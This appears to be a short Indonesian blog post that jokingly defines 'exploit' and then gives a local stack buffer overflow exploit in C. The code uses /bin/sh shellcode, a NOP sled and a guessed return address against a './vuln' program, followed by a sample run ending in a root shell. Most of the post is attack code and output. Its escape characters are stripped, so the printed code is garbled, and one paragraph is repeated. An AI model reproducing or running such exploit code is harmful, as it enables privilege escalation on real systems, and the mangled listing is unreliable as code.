exploit
arti dalam bahasa indonesia mungkin, memanfaatkan atau menipu atau, pokok nya itu deh :D ... kegiatan ini sama halnya dengan naik pangkat secara tidak benar yang di tempuh dengan membodoh-bodohi sistem kepegawaian ... wekekeke kok sampai kesitu yah Bahh..
berikut contoh nya, sekali lagi ini hanya contoh yah, jangan di coba dirumah, tingkat kegagalannya 100% trus buat apa ada tulisan ini, mari nikmati saja HAHAHA ...
berikut contoh nya, sekali lagi ini hanya contoh yah, jangan di coba dirumah, tingkat kegagalannya 100% trus buat apa ada tulisan ini, mari nikmati saja HAHAHA ...
#include <stdlib.h>
char shellcode[] =
"x31xc0xb0x46x31xdbx31xc9xcdx80xebx16x5bx31xc0"
"x88x43x07x89x5bx08x89x43x0cxb0x0bx8dx4bx08x8d"
"x53x0cxcdx80xe8xe5xffxffxffx2fx62x69x6ex2fx73"
"x68";
unsigned long sp(void)
{ __asm__("movl %esp, %eax");}
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
printf("Stack pointer (ESP) : 0x%xn", esp);
printf(" Offset from ESP : 0x%xn", offset);
printf("Desired Return Addr : 0x%xn", ret);
buffer = malloc(600);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
for(i=0; i < 200; i++)
{ buffer[i] = 'x90'; }
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
buffer[600-1] = 0;
execl("./vuln", "vuln", buffer, 0);
free(buffer);
return 0;
}
//Setelah itu compile lah listing di atas, dan abadikan perbuatan mu :P$ gcc -o exploit exploit.c
$ ./exploit
Stack pointer (ESP) : 0xbffff978
Offset from ESP : 0x0
Desired Return Addr : 0xbffff978
sh-2.05a# whoami
root
sh-2.05a#
Comments
Post a Comment